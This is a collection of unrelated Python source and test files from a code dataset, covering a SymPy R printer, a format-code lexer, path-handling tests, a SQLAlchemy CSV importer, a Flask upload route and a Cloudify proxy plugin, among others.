must be provided to ``assign_to``. Note that any expression that can be
generated normally can also exist inside a Matrix:
>>> from sympy import Matrix, MatrixSymbol
>>> mat = Matrix([x**2, Piecewise((x + 1, x > 0), (x, True)), sin(x)])
>>> A = MatrixSymbol('A', 3, 1)
>>> print(rcode(mat, A))
A[0] = x^2;
A[1] = ifelse(x > 0,x + 1,x);
A[2] = sin(x);
"""
return RCodePrinter(settings).doprint(expr, assign_to)
def print_rcode(expr, **settings):
"""Prints R representation of the given expression."""
print(rcode(expr, **settings))
| StarcoderdataPython |
1770088 | <gh_stars>0
from ...hek.defs.phys import *
| StarcoderdataPython |
3299795 | <reponame>Ruzil357/YoloCustomDatasetBoilerPlate_v4
from json import load
from utils.yolo_v4 import run as run_v4
from utils.yolo_v5 import run as run_v5
with open("config.json", "r") as file:
_YOLO_VERSION = load(file)["yolo_version"]
def main():
if _YOLO_VERSION == 4:
run_v4.main()
elif _YOLO_VERSION == 5:
run_v5.main()
if __name__ == '__main__':
main() | StarcoderdataPython |
1691170 | <filename>kata/07/find_calc_type.py
"""
Based on those 3 values you have to return a string, that describes which operation was used to get the given result.
The possible return strings are: "addition", "subtraction", "multiplication", "division".
Notes
In case of division you should expect that the result of the operation is obtained by using / operator on the input values - no manual data type conversion or rounding should be performed.
Cases with just one possible answers are generated.
Only valid arguments will be passed to the function.
Only valid arguments will be passed to the function!
"""
def calc_type(a: int, b: int, res: int) -> str:
"""Find the calculation type by the result.
Examples:
>>> assert calc_type(10, 2, 5) == 'division'
"""
return {
a - b: 'subtraction',
a + b: 'addition',
a / b: 'division',
a * b: 'multiplication',
}[res]
if __name__ == '__main__':
print(calc_type(10, 2, 5))
| StarcoderdataPython |
3397041 | <filename>tests/test_lexer/test_tokens.py
# coding: utf-8
from __future__ import division, print_function, unicode_literals
import pytest
from six.moves import range
from formatcode.lexer.tokens import (AmPmToken, AsteriskSymbol, AtSymbol, BlockDelimiter, ColorToken, CommaDelimiter,
ConditionToken, DateTimeToken, DotDelimiter, EToken, GeneralToken, HashToken,
LocaleCurrencyToken, PercentageSymbol, QToken, SlashSymbol, StringSymbol,
TimeDeltaToken, UnderscoreSymbol, ZeroToken)
def test_general_token():
assert GeneralToken.match('General') == len('General')
assert GeneralToken.match('1') is None
assert GeneralToken('General').cleaned_data == 'General'
def test_slash_token():
assert SlashSymbol.match('/') == 1
assert SlashSymbol.match('1') is None
assert SlashSymbol('/').value is None
assert SlashSymbol.match('/1234') == 5
assert SlashSymbol('/1234').value == 1234
def test_block_delimiter():
assert BlockDelimiter.match(';') == 1
assert BlockDelimiter.match('1') is None
assert BlockDelimiter(';').cleaned_data == ';'
def test_zero():
assert ZeroToken.match('0') == 1
assert ZeroToken.match('1') is None
assert ZeroToken('0').cleaned_data == '0'
def test_q():
assert QToken.match('?') == 1
assert QToken.match('1') is None
assert QToken('?').cleaned_data == '?'
def test_hash():
assert HashToken.match('#') == 1
assert HashToken.match('1') is None
assert HashToken('#').cleaned_data == '#'
def test_comma():
assert CommaDelimiter.match(',') == 1
assert CommaDelimiter.match('1') is None
assert CommaDelimiter(',').cleaned_data == ','
def test_fraction():
assert DotDelimiter.match('.') == 1
assert DotDelimiter.match('1') is None
assert DotDelimiter('.').cleaned_data == '.'
def test_percentage():
assert PercentageSymbol.match('%') == 1
assert PercentageSymbol.match('1') is None
assert PercentageSymbol('%').cleaned_data == '%'
def test_at():
assert AtSymbol.match('@') == 1
assert AtSymbol.match('1') is None
assert AtSymbol('@').cleaned_data == '@'
def test_asterisk():
assert AsteriskSymbol.match('*0') == 2
assert AsteriskSymbol.match('1') is None
assert AsteriskSymbol('*0').value == '0'
def test_underscore():
assert UnderscoreSymbol.match('_') == 1
assert UnderscoreSymbol.match('1') is None
assert UnderscoreSymbol('_').cleaned_data == '_'
@pytest.mark.parametrize('line', ['$', '+', '-', '(', ')', ':', '!', '^',
'&', "'", '~', '{', '}', '<', '>', '=', ' '])
def test_string_without_escape(line):
assert StringSymbol.match(line) == 1
assert StringSymbol(line).value == line
@pytest.mark.parametrize('line', [r'\%s' % chr(i) for i in range(33, 256)])
def test_string_with_escape(line):
assert StringSymbol.match(line) == 2
assert StringSymbol(line).value == line[1]
def test_string_with_quote():
assert StringSymbol.match('"hello"') == 7
assert StringSymbol('"hello"').value == 'hello'
assert StringSymbol.match('"bye"') == 5
assert StringSymbol('"bye"').value == 'bye'
assert StringSymbol.match('"12345"') == 7
assert StringSymbol('"12345"').value == '12345'
assert StringSymbol.match('"') is None
@pytest.mark.parametrize('letter', ['E', 'e'])
@pytest.mark.parametrize('sign', ['-', '+'])
def test_scientific_notation(letter, sign):
line = letter + sign
assert EToken.match(line) == len(line)
token = EToken(line)
assert token.value == sign
assert EToken.match(line + 'test') == len(line)
assert EToken.match('test' + line) is None
@pytest.mark.parametrize('line', ['Black', 'Green', 'White', 'Blue', 'Magenta', 'Yellow', 'Cyan', 'Red',
'Color1', 'Color14', 'Color39', 'Color56'])
def test_color(line):
assert ColorToken.match('[%s]' % line) == len(line) + 2
assert ColorToken('[%s]' % line).value == line
assert ColorToken.match(line) is None
assert ColorToken.match('[' + line) is None
assert ColorToken.match(line + ']') is None
@pytest.mark.parametrize('op', ['<', '>', '=', '<>', '<=', '>='])
@pytest.mark.parametrize('value', [1, 123, 12345, 123.45, 0.1234])
@pytest.mark.parametrize('sign', ['-', '', '+'])
def test_condition(op, value, sign):
signed_value = (value * -1) if sign == '-' else value
assert ConditionToken.match('[%s%s%s]' % (op, sign, value)) == len(op) + len(str(value)) + 2 + len(sign)
token = ConditionToken('[%s%s%s]' % (op, sign, value))
assert token.op == op
assert token.value == signed_value
assert ConditionToken.match('[%s]' % signed_value) is None
assert ConditionToken.match('%s' % signed_value) is None
@pytest.mark.parametrize('line', ['yy', 'yyyy', 'm', 'mm', 'mmm', 'mmmm', 'mmmmm',
'd', 'dd', 'ddd', 'dddd', 'h', 'hh', 's', 'ss'])
def test_date(line):
assert DateTimeToken.match(line) == len(line)
assert DateTimeToken(line).value == line
assert DateTimeToken.match('[%s]' % line) is None
@pytest.mark.parametrize('line', ['h', 'm', 's'])
@pytest.mark.parametrize('count', [1, 2, 4, 8])
def test_timedelta(line, count):
line = ''.join([line] * count)
assert TimeDeltaToken.match(line) is None
assert TimeDeltaToken.match('[%s]' % line) == len(line) + 2
assert TimeDeltaToken('[%s]' % line).value == line
@pytest.mark.parametrize('line', ['AM/PM', 'A/P'])
def test_am_pm(line):
assert AmPmToken.match(line) == len(line)
assert AmPmToken(line).value == line
def test_locale_currency():
assert LocaleCurrencyToken.match('[$USD-409]') == 10
token = LocaleCurrencyToken('[$USD-409]')
assert token.curr == 'USD'
assert token.language_id == 1033
assert token.calendar_type == 0
assert token.number_system == 0
assert LocaleCurrencyToken.match('[$USD]') == 6
token = LocaleCurrencyToken('[$USD]')
assert token.curr == 'USD'
assert token.language_id is None
assert token.calendar_type is None
assert token.number_system is None
assert LocaleCurrencyToken.match('[$-409]') == 7
assert LocaleCurrencyToken.match('[$-f409]') == 8
assert LocaleCurrencyToken.match('[$-ffffffff]') == 12
token = LocaleCurrencyToken('[$-ffffffff]')
assert token.curr == ''
assert token.language_id == 65535
assert token.calendar_type == 255
assert token.number_system == 255
assert LocaleCurrencyToken.match('[$$-ffffffff]') == 13
assert LocaleCurrencyToken.match('[$$-fffffffff]') is None
assert LocaleCurrencyToken.match('[-fffffffff]') is None
| StarcoderdataPython |
20607 | """ test gpath
isort:skip_file
"""
import os
import sys
import unittest
try:
from unittest import mock
except ImportError:
import mock
SRC = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), "src")
if SRC not in sys.path:
sys.path.insert(0, SRC)
from ciopath.gpath import Path
sys.modules["glob"] = __import__("mocks.glob", fromlist=["dummy"])
class BadInputTest(unittest.TestCase):
def test_empty_input(self):
with self.assertRaises(ValueError):
self.p = Path("")
class RootPath(unittest.TestCase):
def test_root_path(self):
self.p = Path("/")
self.assertEqual(self.p.fslash(), "/")
self.assertEqual(self.p.bslash(), "\\")
def test_drive_letter_root_path(self):
self.p = Path("C:\\")
self.assertEqual(self.p.fslash(), "C:/")
self.assertEqual(self.p.bslash(), "C:\\")
class SpecifyDriveLetterUse(unittest.TestCase):
def test_remove_from_path(self):
self.p = Path("C:\\a\\b\\c")
self.assertEqual(self.p.fslash(with_drive=False), "/a/b/c")
self.assertEqual(self.p.bslash(with_drive=False), "\\a\\b\\c")
def test_remove_from_root_path(self):
self.p = Path("C:\\")
self.assertEqual(self.p.fslash(with_drive=False), "/")
self.assertEqual(self.p.bslash(with_drive=False), "\\")
class AbsPosixPathTest(unittest.TestCase):
def setUp(self):
self.p = Path("/a/b/c")
def test_fslash_out(self):
self.assertEqual(self.p.fslash(), "/a/b/c")
def test_win_path_out(self):
self.assertEqual(self.p.bslash(), "\\a\\b\\c")
class AbsWindowsPathTest(unittest.TestCase):
def setUp(self):
self.p = Path("C:\\a\\b\\c")
def test_fslash_out(self):
self.assertEqual(self.p.fslash(), "C:/a/b/c")
def test_win_path_out(self):
self.assertEqual(self.p.bslash(), "C:\\a\\b\\c")
# consider just testing on both platforms
def test_os_path_out(self):
with mock.patch("os.name", "posix"):
self.assertEqual(self.p.os_path(), "C:/a/b/c")
with mock.patch("os.name", "nt"):
self.assertEqual(self.p.os_path(), "C:\\a\\b\\c")
class PathStringTest(unittest.TestCase):
def test_path_emits_string_posix(self):
input_file = "/path/to/thefile.jpg"
p = Path(input_file)
self.assertEqual(str(p), input_file)
def test_path_emits_string_with_drive(self):
input_file = "C:/path/to/thefile.jpg"
p = Path(input_file)
self.assertEqual(str(p), input_file)
def test_path_emits_string_relative(self):
input_file = "path/to/thefile.jpg"
p = Path(input_file)
self.assertEqual(str(p), input_file)
class WindowsMixedPathTest(unittest.TestCase):
def test_abs_in_fslash_out(self):
self.p = Path("\\a\\b\\c/d/e")
self.assertEqual(self.p.fslash(), "/a/b/c/d/e")
def test_abs_in_bslash_out(self):
self.p = Path("\\a\\b\\c/d/e")
self.assertEqual(self.p.bslash(), "\\a\\b\\c\\d\\e")
def test_letter_abs_in_fslash_out(self):
self.p = Path("C:\\a\\b\\c/d/e")
self.assertEqual(self.p.fslash(), "C:/a/b/c/d/e")
def test_letter_abs_in_bslash_out(self):
self.p = Path("C:\\a\\b\\c/d/e")
self.assertEqual(self.p.bslash(), "C:\\a\\b\\c\\d\\e")
class MiscPathTest(unittest.TestCase):
def test_many_to_single_backslashes_bslash_out(self):
self.p = Path("C:\\\\a\\b///c")
self.assertEqual(self.p.bslash(), "C:\\a\\b\\c")
class PathExpansionTest(unittest.TestCase):
def setUp(self):
self.env = {
"HOME": "/users/joebloggs",
"SHOT": "/metropolis/shot01",
"DEPT": "texturing",
}
def test_posix_tilde_input(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("~/a/b/c")
self.assertEqual(self.p.fslash(), "/users/joebloggs/a/b/c")
def test_posix_var_input(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("$SHOT/a/b/c")
self.assertEqual(self.p.fslash(), "/metropolis/shot01/a/b/c")
def test_posix_two_var_input(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("$SHOT/a/b/$DEPT/c")
self.assertEqual(self.p.fslash(), "/metropolis/shot01/a/b/texturing/c")
def test_windows_var_input(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("$HOME\\a\\b\\c")
self.assertEqual(self.p.bslash(), "\\users\\joebloggs\\a\\b\\c")
self.assertEqual(self.p.fslash(), "/users/joebloggs/a/b/c")
def test_tilde_no_expand(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("~/a/b/c", no_expand=True)
self.assertEqual(self.p.fslash(), "~/a/b/c")
def test_posix_var_no_expand(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("$SHOT/a/b/c", no_expand=True)
self.assertEqual(self.p.fslash(), "$SHOT/a/b/c")
def no_expand_variable_considered_relative(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("$SHOT/a/b/c", no_expand=True)
self.assertTrue(self.p.relative)
self.assertFalse(self.p.absolute)
def expanded_variable_considered_absolute(self):
with mock.patch.dict("os.environ", self.env):
self.p = Path("$SHOT/a/b/c", no_expand=False)
self.assertFalse(self.p.relative)
self.assertTrue(self.p.absolute)
class PathContextExpansionTest(unittest.TestCase):
def setUp(self):
self.env = {
"HOME": "/users/joebloggs",
"SHOT": "/metropolis/shot01",
"DEPT": "texturing",
}
self.context = {
"HOME": "/users/janedoe",
"FOO": "fooval",
"BAR_FLY1_": "bar_fly1_val",
"ROOT_DIR": "/some/root",
}
def test_path_replaces_context(self):
self.p = Path("$ROOT_DIR/thefile.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/some/root/thefile.jpg")
def test_path_replaces_multiple_context(self):
self.p = Path("$ROOT_DIR/$BAR_FLY1_/thefile.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/some/root/bar_fly1_val/thefile.jpg")
def test_path_context_overrides_env(self):
self.p = Path("$HOME/thefile.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/users/janedoe/thefile.jpg")
def test_path_leave_unknown_variable_in_tact(self):
self.p = Path("$ROOT_DIR/$BAR_FLY1_/$FOO/thefile.$F.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/some/root/bar_fly1_val/fooval/thefile.$F.jpg")
def test_path_replaces_context_braces(self):
self.p = Path("${ROOT_DIR}/thefile.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/some/root/thefile.jpg")
def test_path_replaces_multiple_context_braces(self):
self.p = Path("${ROOT_DIR}/${BAR_FLY1_}/thefile.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/some/root/bar_fly1_val/thefile.jpg")
def test_path_context_overrides_env_braces(self):
self.p = Path("${HOME}/thefile.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/users/janedoe/thefile.jpg")
def test_path_leave_unknown_variable_in_tact_braces(self):
self.p = Path("${ROOT_DIR}/${BAR_FLY1_}/${FOO}/thefile.$F.jpg", context=self.context)
self.assertEqual(self.p.fslash(), "/some/root/bar_fly1_val/fooval/thefile.$F.jpg")
class PathLengthTest(unittest.TestCase):
def test_len_with_drive_letter(self):
self.p = Path("C:\\aaa\\bbb/c")
self.assertEqual(len(self.p), 12)
def test_len_with_no_drive_letter(self):
self.p = Path("\\aaa\\bbb/c")
self.assertEqual(len(self.p), 10)
def test_depth_with_drive_letter(self):
self.p = Path("C:\\aaa\\bbb/c")
self.assertEqual(self.p.depth, 3)
def test_depth_with_no_drive_letter(self):
self.p = Path("\\aaa\\bbb/c")
self.assertEqual(self.p.depth, 3)
def test_depth_with_literal_rel_path(self):
self.p = Path("aaa\\bbb/c")
self.assertEqual(self.p.depth, 3)
class AbsolutePathCollapseDotsTest(unittest.TestCase):
def test_path_collapses_single_dot(self):
p = Path("/a/b/./c")
self.assertEqual(p.fslash(), "/a/b/c")
def test_path_collapses_double_dot(self):
p = Path("/a/b/../c")
self.assertEqual(p.fslash(), "/a/c")
def test_path_collapses_many_single_dots(self):
p = Path("/a/b/./c/././d")
self.assertEqual(p.fslash(), "/a/b/c/d")
def test_path_collapses_many_consecutive_double_dots(self):
p = Path("/a/b/c/../../d")
self.assertEqual(p.fslash(), "/a/d")
def test_path_collapses_many_non_consecutive_double_dots(self):
p = Path("/a/b/c/../../d/../e/f/../g")
self.assertEqual(p.fslash(), "/a/e/g")
def test_path_collapses_many_non_consecutive_mixed_dots(self):
p = Path("/a/./b/c/../.././d/../././e/f/../g/./")
self.assertEqual(p.fslash(), "/a/e/g")
self.assertEqual(p.depth, 3)
def test_path_collapses_to_root(self):
p = Path("/a/b/../../")
self.assertEqual(p.fslash(), "/")
self.assertEqual(p.depth, 0)
def test_raise_when_collapse_too_many_dots(self):
with self.assertRaises(ValueError):
Path("/a/b/../../../")
class RelativePathCollapseDotsTest(unittest.TestCase):
def test_resolve_relative_several_dots(self):
p = Path("./a/b/../../../c/d")
self.assertEqual(p.fslash(), "../c/d")
self.assertEqual(p.all_components, ["..", "c", "d"])
self.assertEqual(p.depth, 3)
def test_resolve_leading_relative_dots(self):
p = Path("../c/d")
self.assertEqual(p.fslash(), "../c/d")
def test_resolve_leading_relative_dots(self):
p = Path("../../../c/d")
self.assertEqual(p.fslash(), "../../../c/d")
def test_resolve_only_relative_dots(self):
p = Path("../../../")
self.assertEqual(p.fslash(), "../../../")
def test_collapse_contained_components(self):
p = Path("../../../a/b/../../../")
self.assertEqual(p.fslash(), "../../../../")
def test_remove_trailing_dot(self):
p = Path("../../.././")
self.assertEqual(p.fslash(), "../../../")
def test_cwd(self):
p = Path(".")
self.assertEqual(p.fslash(), "./")
def test_down_up_cwd(self):
p = Path("a/..")
self.assertEqual(p.fslash(), "./")
def test_up_down_sibling(self):
p = Path("../a")
self.assertEqual(p.fslash(), "../a")
def test_up_down_sibling_bslash(self):
p = Path("../a")
self.assertEqual(p.bslash(), "..\\a")
class PathComponentsTest(unittest.TestCase):
def test_path_gets_tail(self):
p = Path("/a/b/c")
self.assertEqual(p.tail, "c")
def test_path_gets_none_when_no_tail(self):
p = Path("/")
self.assertEqual(p.tail, None)
def test_path_ends_with(self):
p = Path("/a/b/cdef")
self.assertTrue(p.endswith("ef"))
def test_path_not_ends_with(self):
p = Path("/a/b/cdef")
self.assertFalse(p.endswith("eg"))
class RelativePathTest(unittest.TestCase):
def test_rel_path_does_not_raise(self):
p = Path("a/b/c")
self.assertEqual(p.fslash(), "a/b/c")
class EqualityTests(unittest.TestCase):
def test_paths_equal(self):
p1 = Path("a/b/c")
p2 = Path("a/b/c")
self.assertTrue(p1 == p2)
def test_same_object_equal(self):
p1 = Path("a/b/c")
self.assertTrue(p1 == p1)
def test_different_paths_equal_false(self):
p1 = Path("a/b/c")
p2 = Path("a/b/d")
self.assertFalse(p1 == p2)
def test_paths_not_equal(self):
p1 = Path("a/b/c")
p2 = Path("a/b/d")
self.assertTrue(p1 != p2)
class InitializeWithComponentsTests(unittest.TestCase):
def test_initialize_with_lettered_components(self):
p = Path(["C:", "a", "b", "c"])
self.assertEqual(p.fslash(with_drive=True), "C:/a/b/c")
def test_initialize_with_backslash_unc_components(self):
p = Path(["\\", "a", "b", "c"])
self.assertEqual(p.fslash(with_drive=True), "//a/b/c")
def test_initialize_with_fwslash_unc_components(self):
p = Path(["/", "a", "b", "c"])
self.assertEqual(p.fslash(with_drive=True), "//a/b/c")
def test_initialize_with_unc_components(self):
p = Path(["/", "a", "b", "c"])
self.assertEqual(p.bslash(with_drive=True), "\\\\a\\b\\c")
def test_initialize_with_relative_components(self):
p = Path(["a", "b", "c"])
self.assertEqual(p.bslash(with_drive=True), "a\\b\\c")
def test_initialize_with_relative_components_is_relative(self):
p = Path(["a", "b", "c"])
self.assertTrue(p.relative)
self.assertFalse(p.absolute)
class GetComponentsTests(unittest.TestCase):
def test_get_all_components(self):
p = Path("/a/b/c")
self.assertEqual(p.all_components, ["a", "b", "c"])
def test_get_all_components_with_drive(self):
p = Path("C:/a/b/c")
self.assertEqual(p.all_components, ["C:", "a", "b", "c"])
def test_get_all_components_with_unc_fwslash(self):
p = Path("//a/b/c")
self.assertEqual(p.all_components, ["/", "a", "b", "c"])
def test_get_all_components_with_unc_backslash(self):
p = Path("\\\\a\\b\\c")
self.assertEqual(p.all_components, ["/", "a", "b", "c"])
class UNCTests(unittest.TestCase):
def test_unc_root_with_drive(self):
p = Path("\\\\a\\b\\c")
self.assertEqual(p.fslash(with_drive=True), "//a/b/c")
def test_unc_is_absolute(self):
p = Path("\\\\a\\b\\c")
self.assertTrue(p.absolute)
def test_unc_root_without_drive(self):
p = Path("\\\\a\\b\\c")
self.assertEqual(p.fslash(with_drive=False), "/a/b/c")
def test_unc_root_with_forward(self):
p = Path("//a/b/c")
self.assertEqual(p.fslash(with_drive=True), "//a/b/c")
def test_is_unc(self):
p = Path("\\\\a\\b\\c")
self.assertTrue(p.is_unc)
p = Path("//a/b/c")
self.assertTrue(p.is_unc)
def test_posix_abs_is_not_unc(self):
p = Path(["/a/b/c"])
self.assertFalse(p.is_unc)
def test_relative_is_not_unc(self):
p = Path(["a/b/c"])
self.assertFalse(p.is_unc)
def test_drive_letter_is_not_unc(self):
p = Path("C:\\aaa\\bbb\\c")
self.assertFalse(p.is_unc)
if __name__ == "__main__":
unittest.main()
| StarcoderdataPython |
1797000 | <filename>Downey2011_exes/exe_02-01.py
#!/usr/bin/python
# vim: set fileencoding=utf8 :
"""
# UFRJ - PPGI
# MAB719
# <NAME> <<EMAIL>>
ThinkStats: Exercício 2.1
"""
import thinkstats
import math
_pumpkins_weight = [1, 1, 1, 3, 3, 591]
def Pumpkin(pumpkins_weight):
"""
Calculate the mean and
"""
mu, var = thinkstats.MeanVar(pumpkins_weight)
return mu, var, math.sqrt(var)
if __name__ == '__main__':
print Pumpkin(_pumpkins_weight)
| StarcoderdataPython |
1798590 | <reponame>symroe/moto<filename>moto/sdb/urls.py<gh_stars>1000+
from .responses import SimpleDBResponse
url_bases = [
r"https?://sdb\.(.+)\.amazonaws\.com",
]
url_paths = {"{0}/$": SimpleDBResponse.dispatch}
| StarcoderdataPython |
1786890 | import csv;
import datetime
from sqlalchemy import Column, ForeignKey, Integer, String, Date, Boolean
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship
from sqlalchemy.orm import sessionmaker
from pprint import pprint
SQLITE_CONNECTION_STRING = 'sqlite:///adress_person.db'
FIELD_LENGTH = 250
def str2bool(v):
return v.lower() in ("ja", "yes", "jaaaaaaa")
Base = declarative_base()
class Person(Base):
__tablename__ = 'person'
id = Column(Integer, primary_key=True, nullable=False)
vorname = Column(String(FIELD_LENGTH), nullable=False)
nachname = Column(String(FIELD_LENGTH), nullable=False)
geburtsdatum = Column(Date(), nullable=True)
telefon = Column(String(FIELD_LENGTH), nullable=True)
email = Column(String(FIELD_LENGTH), nullable=True)
newsletter = Column(Boolean(), nullable=True)
def __repr__(self) -> str:
return self.vorname + " - " +self.nachname
class Address(Base):
__tablename__ = 'address'
id = Column(Integer, primary_key=True)
street_name = Column(String(FIELD_LENGTH))
street_number = Column(String(FIELD_LENGTH))
post_code = Column(String(FIELD_LENGTH), nullable=False)
city = Column(String(FIELD_LENGTH))
person_id = Column(Integer, ForeignKey('person.id'))
person = relationship(Person)
engine = create_engine(SQLITE_CONNECTION_STRING)
Base.metadata.create_all(engine)
def read_and_insert():
global person, address
filename = "../../../challenge/Testdaten_1.csv"
csvReader = csv.DictReader(open(filename, newline=''), skipinitialspace=True, delimiter=';', quotechar='|')
for row in csvReader:
row = {x.strip(): y for x, y in row.items()}
row = dict(zip(row.keys(), [v.strip() if isinstance(v,str) else v for v in row.values()]))
print(row)
person = Person()
person.vorname = row["Vorname"]
person.nachname = row["Nachname"]
person.geburtsdatum = datetime.datetime.strptime(row["Geburtsdatum"].strip(), "%d.%m.%Y").date()
person.id = row["Nr."]
person.email = row["E-Mail"]
person.telefon = row["Telefon"]
person.newsletter = str2bool(row["Newsletter"])
strasse = row["Straße"].split(" ")[0]
str_number = row["Straße"].split(" ")[len(row["Straße"].split(" ")) - 1]
address = Address()
address.street_name = strasse
address.street_number = str_number
address.post_code = row["PLZ"].strip()
address.city = row["Stadt"].strip()
address.id = person.id
address.person = person
DBSession = sessionmaker(bind=engine)
session = DBSession()
# Insert a Person in the person table
session.add(person)
session.commit()
# Insert an Address in the address table
session.add(address)
session.commit()
#read_and_insert()
DBSession = sessionmaker(bind=engine)
session = DBSession()
#print(len(session.query(Person).all()))
#person = session.query(Person).first()
#print(person.vorname)
#session.query(Address).filter(Address.person == person).all()
#session.query(Address).filter(Address.person == person).one()
#address = session.query(Address).filter(Address.person == person).one()
pprint(session.query(Person).filter(Person.vorname == "Pauline").all())
#print(address.post_code)
| StarcoderdataPython |
1651452 | class image:
def __init__(self, mx, img, enh):
self.mins = 0
self.maxs = mx
self.img = img
self.enh = enh
self.default = '0'
def enhance(self):
self.mins -= 1
self.maxs += 1
influence = [(-1,-1),(0,-1),(1,-1),
(-1, 0),(0, 0),(1, 0),
(-1, 1),(0, 1),(1, 1)]
new_image = dict()
for py in range(self.mins-1, self.maxs+2):
for px in range(self.mins-1, self.maxs+2):
enh_lookup = ''
for ox, oy in influence:
if (px+ox,py+oy) in self.img:
enh_lookup += '1'
elif px+ox < self.mins or px+ox > self.maxs or py+oy < self.mins or py+oy > self.maxs:
enh_lookup += self.default
else:
enh_lookup += '0'
if self.enh[int(enh_lookup,2)] == '#':
new_image[(px,py)] = True
self.img = new_image
return
def print_img(self):
print(self.img)
for y in range(self.mins,self.maxs):
line = ''
for x in range(self.mins,self.maxs):
if (x,y) in self.img:
line += '#'
else:
line += '.'
print(line)
return
def import_image(ifile):
img = dict()
with open(ifile) as f:
enh = list(f.readline().strip())
f.readline()
row = 0
while True:
line = f.readline().strip()
if not line:
break
else:
for col, ch in enumerate(line):
if ch == '#':
img[(col,row)] = True
row += 1
return image(row, img, enh)
def make_the_rounds(img_file, rounds):
image_class = import_image(img_file)
for i in range(rounds):
if image_class.enh[0] == "." or i % 2 == 0:
image_class.default = "0"
else:
image_class.default = "1"
image_class.enhance()
print(len(image_class.img))
return len(image_class.img)
################################
print("-- Part 1")
assert make_the_rounds("sample.txt",2) == 35
assert make_the_rounds("input.txt",2) == 5179
print("\n-- Part 2")
assert make_the_rounds("sample.txt",50) == 3351
assert make_the_rounds("input.txt",50) == 16112
| StarcoderdataPython |
3395368 | <filename>MFWR/views/upload.py
# Webserver Dependencies
from flask import Flask, render_template, request, redirect, url_for, send_from_directory
from MFWR import app
# Image Upload Dependencies
import os
from werkzeug import secure_filename
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1] in app.config['ALLOWED_IMAGE_EXTENSIONS']
def upload_image(file):
""" store image to configured location and return url.
if no file, return nothing. """
if file and allowed_file(file.filename):
filename = secure_filename(file.filename)
file.save(os.getcwd() + os.path.join( app.config['UPLOAD_FOLDER'],
filename ))
return url_for('uploaded_image', filename=filename)
@app.route('/uploads/images/<filename>')
def uploaded_image(filename):
print "uploaded_image triggered!"
return send_from_directory(os.getcwd() + app.config['UPLOAD_FOLDER'], filename)
| StarcoderdataPython |
3269260 | # Copyright (c) 2015 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
import sys
import proxy_common
from cloudify import ctx
from cloudify import exceptions
from cloudify import manager
from cloudify.decorators import operation
@operation
def create_validation(**kwargs):
ctx.logger.info("Entering create_validation event.")
client = manager.get_rest_client()
deployment_id = ctx.node.properties['deployment_id']
if not deployment_id or deployment_id == '':
ctx.logger.error("Malformed deployment ID.")
raise exceptions.NonRecoverableError(
"Deployment ID is not specified.")
try:
client.deployments.get(deployment_id)
ctx.logger.info("Success, deployment exists.")
except Exception as ex:
ctx.logger.error("Error during obtaining deployment {0}. "
"Reason: {1}."
.format(deployment_id, str(ex)))
raise exceptions.NonRecoverableError(
"Error during obtaining deployment {0}. "
"Reason: {1}.".format(deployment_id, str(ex)))
ctx.logger.info("Exiting create_validation event.")
@operation
def wait_for_deployment(deployment_id, **kwargs):
ctx.logger.info("Entering wait_for_deployment event.")
ctx.logger.info("Using deployment %s" % deployment_id)
if not deployment_id:
raise exceptions.NonRecoverableError(
"Deployment ID not specified.")
client = manager.get_rest_client()
timeout = ctx.node.properties['timeout']
proxy_common.poll_until_with_timeout(
proxy_common.check_if_deployment_is_ready(
client, deployment_id),
expected_result=True,
timeout=timeout)
ctx.logger.info("Exiting wait_for_deployment event.")
@operation
def inherit_deployment_attributes(deployment_id, **kwargs):
ctx.logger.info("Entering obtain_outputs event.")
client = manager.get_rest_client()
outputs = ctx.node.properties['inherit_outputs']
ctx.logger.info("Outputs to inherit: {0}."
.format(str(outputs)))
ctx.logger.info('deployment id %s' % deployment_id)
inherit_inputs = ctx.node.properties['inherit_inputs']
ctx.instance.runtime_properties.update({
'inherit_outputs': outputs,
'deployment_id': deployment_id
})
try:
if inherit_inputs:
_inputs = client.deployments.get(deployment_id)['inputs']
ctx.instance.runtime_properties.update(
{'proxy_deployment_inputs': _inputs})
deployment_outputs = client.deployments.outputs.get(
deployment_id)['outputs']
ctx.logger.info("Available deployment outputs {0}."
.format(str(deployment_outputs)))
ctx.logger.info("Available runtime properties: {0}.".format(
str(ctx.instance.runtime_properties.keys())
))
for key in outputs:
ctx.instance.runtime_properties.update(
{key: deployment_outputs.get(key)}
)
except Exception as ex:
ctx.logger.error(
"Caught exception during obtaining "
"deployment outputs {0} {1}"
.format(sys.exc_info()[0], str(ex)))
raise exceptions.NonRecoverableError(
"Caught exception during obtaining "
"deployment outputs {0} {1}. Available runtime properties {2}"
.format(sys.exc_info()[0], str(ex),
str(ctx.instance.runtime_properties.keys())))
ctx.logger.info("Exiting obtain_outputs event.")
@operation
def cleanup(**kwargs):
ctx.logger.info("Entering cleanup_outputs event.")
outputs = ctx.instance.runtime_properties.get('inherit_outputs', [])
if ('proxy_deployment_inputs' in
ctx.instance.runtime_properties):
del ctx.instance.runtime_properties['proxy_deployment_inputs']
for key in outputs:
if key in ctx.instance.runtime_properties:
del ctx.instance.runtime_properties[key]
ctx.logger.info("Exiting cleanup_outputs event.")
@operation
def install_deployment(**kwargs):
ctx.logger.info("Entering install_deployment event.")
if 'deployment_id' not in ctx.instance.runtime_properties:
